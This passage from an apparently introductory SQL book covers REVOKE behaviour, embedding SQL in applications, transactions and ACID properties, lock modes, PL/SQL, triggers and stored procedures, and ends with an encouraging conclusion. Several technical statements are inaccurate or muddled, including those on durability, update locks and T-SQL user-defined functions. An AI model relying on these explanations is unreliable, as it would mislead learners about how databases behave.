REVOKE query. The modifications will not be applicable to
all other users connected to the server, while the REVOKE
statement is being executed.
The modifications made to the database privileges are
only applicable once a USE statement has been executed after
the execution of the REVOKE query.
The table and column privilege modifications will be
applicable to all the queries executed, after the modifications
have been rendered with the REVOKE statement.
Chapter 17 Real-World Uses
We have seen how we can use SQL in isolation. For instance, we went
through different ways to create tables and what operations you can perform
on those tables to retrieve the required answers. If you only wish to learn how
SQL works, you can use this type of learning, but this is not how SQL is
used.
The syntax of SQL is close to English, but it is not an easy language to
master. Most computer users are not familiar with SQL, and you can assume
that there will always be individuals who do not understand how to work with
SQL. If a question about a database comes up, a user will almost never use a
SELECT statement to answer that question. Application developers and
systems analysts are probably the only people who are comfortable with
using SQL. They do not make a career out of typing queries into a database
to retrieve information. They instead develop applications that write queries.
If you intend to reuse the same operation, you should ensure that you never
have to rebuild that operation from scratch. Instead, write an application to do
the job for you. If you use SQL in the application, it will work differently.
SQL IN AN APPLICATION
You may believe that SQL is an incomplete programming language. If you
want to use SQL in an application, you must combine SQL with another
procedural language like FORTRAN, Pascal, C, Visual Basic, C++, COBOL,
or Java. SQL has some strengths and weaknesses because of how the
language is structured. A procedural language that is structured differently
will have different strengths and weaknesses. When you combine the two
languages, you can overcome the weaknesses of both SQL and the procedural
language.
You can build a powerful application when you combine SQL and a
procedural language. This application will have a wide range of capabilities.
We use an asterisk to indicate that we want to include all the columns in the
table. If this table has many columns, you can save a lot of time by typing an
asterisk. Do not use an asterisk when you are writing a program in a
procedural language. Once you have written the application, you may want to
add or delete a column from the table when it is no longer necessary. When
you do this, you change the meaning of the asterisk. If you use the asterisk in
the application, it may retrieve columns which it thinks it is getting.
This change will not affect the existing program until you need to recompile
it to make some change or fix a bug. The effect of the asterisk wildcard will
then expand to current columns. The application could stop working if it
cannot identify the bug during the debugging process. Therefore, when you
build an application, refer to the column names explicitly in the application
and avoid using the asterisk.
Since the replacement of paper files stored in a physical file cabinet,
relational databases have given way to new ground. Relational database
management systems, or RDBMS for short, are used anywhere information is
stored or retrieved, like a login account for a website or articles on a blog.
Speaking of which, this also gave a new platform to and helped leverage
websites like Wikipedia, Facebook, Amazon, and eBay. Wikipedia, for
instance, contains articles, links, and images, all of which are stored in a
database behind-the-scene. Facebook holds much of the same type of
information, and Amazon holds product information and payment methods,
and even handles payment transactions.
With that in mind, banks also use databases for payment transactions and to
manage the funds within someone’s bank account. Other industries, like
retail, use databases to store product information, inventory, sales
transactions, price, and so much more. Medical offices use databases to store
patient information, prescription medication, appointments, and other
information.
To expand further, using the medical office for instance, a database gives
permission for numerous users to connect to it at once and interact with its
information. Since it uses a network to manage connections, virtually anyone
with access to the database can access it from just about anywhere in the
world.
These types of databases have also given way to new jobs and have even
expanded the tasks and responsibilities of current jobs. Those who are in
finance, for instance, now have the ability to run reports on financial data;
those in sales can run reports for sales forecasts, and so much more!
In practical situations, databases are often used by multiple users at the same
time. A database that can support many users at once has a high level of
concurrency. In some situations, concurrency can lead to loss of data or the
reading of non-existent data. SQL manages these situations by using
transactions to control atomicity, consistency, isolation, and durability. These
elements comprise the properties of transactions. A transaction is a sequence
of T-SQL statements that combine logically and complete an operation that
would otherwise introduce inconsistency to a database. Atomicity is a
property that acts as a container for transaction statements. If the statement is
successful, then the total transaction completes. If any part of a transaction is
unable to process fully, then the entire operation fails, and all partial changes
roll back to a prior state. Transactions take place once a row, or a page-wide
lock is in place. Locking prevents modification of data from other users
taking effect on the locked object. It is akin to reserving a spot within the
database to make changes. If another user attempts to change data under lock,
their process will fail, and an alert communicates that the object in question is
barred and unavailable for modification. Transforming data using
transactions allows a database to move from one consistent state to a new
consistent state. It's critical to understand that transactions can modify more
than one database at a time. Changing data in a primary key or foreign key
field without simultaneously updating the other location, creates inconsistent
data that SQL does not accept. Transactions are a big part of changing related
data from multiple table sources all at once. Transactional transformation
reinforces isolation, a property that prevents concurrent transactions from
interfering with each other. If two simultaneous transactions take place at the
same time, only one of them will be successful. Transactions are invisible
until they are complete. Whichever transaction completes first will be
accepted. The new information displays upon completion of the failed
transaction, and at that point, the user must decide if the updated information
still requires modification. If there happened to be a power outage and the
stability of the system fails, data durability would ensure that the effects of
incomplete transactions rollback. If one transaction completes and another
concurrent transaction fails to finish, the completed transaction is retained.
Rollbacks are accomplished by the database engine using the transaction log
to identify the previous state of data and match the data to an earlier point in
time.
There are a few variations of a database lock, and various properties of locks
as well. Lock properties include mode, granularity, and duration. The easiest
to define is duration, which specifies a time interval where the lock is
applied. Lock modes define different types of locking, and these modes are
determined based on the type of resource being locked. A shared lock allows
the data reads while the row or page lock is in effect. Exclusive locks are for
performing data manipulation (DML), and they provide exclusive use of a
row or page for the execution of data modification. Exclusive locks do not
take place concurrently, as data is being actively modified; the page is then
inaccessible to all other users regardless of permissions. Update locks are
placed on a single object and allow for the data reads while the update lock is
in place. They also allow the database engine to determine if an exclusive
lock is necessary once a transaction that modifies an object is committed.
This is only true if no other locks are active on the object in question at the
time of the update lock. The update lock is the best of both worlds, allowing
reading of data and DML transactions to take place at the same time until the
actual update is committed to the row or table. These lock types describe
page-level locking, but there are other types beyond the scope of this
text. The final property of a lock, the granularity, specifies to what degree a
resource is unavailable. Rows are the smallest object available for locking,
leaving the rest of the database available for manipulations. Pages, indexes,
tables, extents, or the entire database are candidates for locking. An extent is
a physical allocation of data, and the database engine will employ this lock if
a table or index grows and more disk space is needed. Problems can arise
from locks, such as lock escalation or deadlock, and we highly encourage
readers to pursue a deeper understanding of how these function.
It is useful to mention that Oracle developed an extension for SQL that
allows for procedural instruction using SQL syntax. This is called PL/SQL,
and as we discussed at the beginning of the book, SQL on its own is unable to
provide procedural instruction because it is a non-procedural language. The
extension changes this and expands the capabilities of SQL. PL/SQL code is
used to create and modify advanced SQL concepts such as functions, stored
procedures, and triggers. Triggers allow SQL to perform specific operations
when conditional instructions are defined. They are an advanced functionality
of SQL, and often work in conjunction with logging or alerts to notify
principals or administrators when errors occur. SQL lacks control structures,
the for looping, branching, and decision making, which are available in
programming languages such as Java. The Oracle corporation developed
PL/SQL to meet the needs of their database product, which includes similar
functionality to other database management systems, but is not limited to
non-procedural operations. Previously, user-defined functions were
mentioned but not defined. T-SQL does not adequately cover the creation of
user-defined functions, but using programming, it is possible to create
functions that fit neatly within the same scope as system-defined functions. A
user-defined function (UDF) is a programming construct that accepts
parameters, performs tasks capable of making use of system defined
parameters, and returns results successfully. UDFs are tricky because
Microsoft SQL allows for stored procedures that often can accomplish the
same task as a user-defined function. Stored procedures are a batch of SQL
statements that are executed in multiple ways and contain centralized data
access logic. Both of these features are important when working with SQL in
production environments.
Conclusion
Well, we have come to the end of our journey for now. That was the absolute
basics of SQL programming, everything you need to know to make your
promotion the success you deserve. As you have seen, SQL is somewhat
complicated; it certainly isn’t the easiest of languages to learn! It will require
you to focus your full attention on it if you are to understand the basics but,
once you have learned them, you will find that it is very easy to build things
up and move on another stage.
If something doesn’t make sense to you, don’t be afraid to repeat it; go over it
and practice the examples until you have a better understanding. The only
thing I will say here is don’t ever spend too long on a problem – you won’t
grasp it any quicker and are more likely to go backwards. Although you are
working on SQL all day long at work, it is quite another matter when you are
learning it. The brain will only take in so much information before it can’t go
any further so don’t overdo it.
Although it can be much to learn, SQL can be a very simple language to use
in a database. By taking advantage of the necessary tools in this book, you
can successfully maneuver your way throughout any database. It is important
to keep in mind that not all formulas work the same in every database and
there are different versions listed in the book.
Although this has been written with examples of clients or inventory charts,
there are many uses for databases. The examples given are not to be taken
completely literal. You can use the information in this book to fit whatever
your needs are for any database.
There is plenty to learn when it comes to SQL, but with the use of practice
and good knowledge, you can be as successful as you decide to be in any
database. Just how the English language has many rules to be followed, the
same applies with SQL. By taking the time to thoroughly learn the language,
many things are achievable with the use of a database. Refer back to any of
the information in this book any time you are stumped on something you are
working on.
Although it can be a complex challenge, patience and practice will help you
successfully learn SQL. By remembering the basic commands and rules to
SQL, you will avoid any issues that can come across most individuals that
practice the use of it. It is a lot of information to take in, but instead, take it as
it comes. Go to the practical tools that you may need for whatever you are
trying to achieve through the database. When presented with an obstacle or
complex assignment, refer to the tools that will clear up what you need. Take
time to fully analyze what is before you while also trying to focus on one
thing at a time.
Keep an open and simple mind when moving forward and you will keep any
issues from becoming more complicated than what they need to be. As
mention, SQL can be a simple thing to learn. You just need to take the time
to understand what everything fully means in depth. If something doesn’t
turn out as expected, retrace your tracks to find where you might have
inappropriately added a formula and some of the information. By building
and maintaining successful problem-solving skills, you will not limit your
success.
One more thing; don’t ever be afraid to change the data in the examples. It
will help you to learn quicker if you can see for yourself what works and
what doesn’t. You can see how different results are achieved with different
data and you will get a better understanding of how a particular statement
might work.

I want to wish you the very best of luck in learning SQL and I hope that that
it serves you well in your working life and that is tempts you to move on and
learn more about the computer programming languages that every
organization loves to use.

You might also like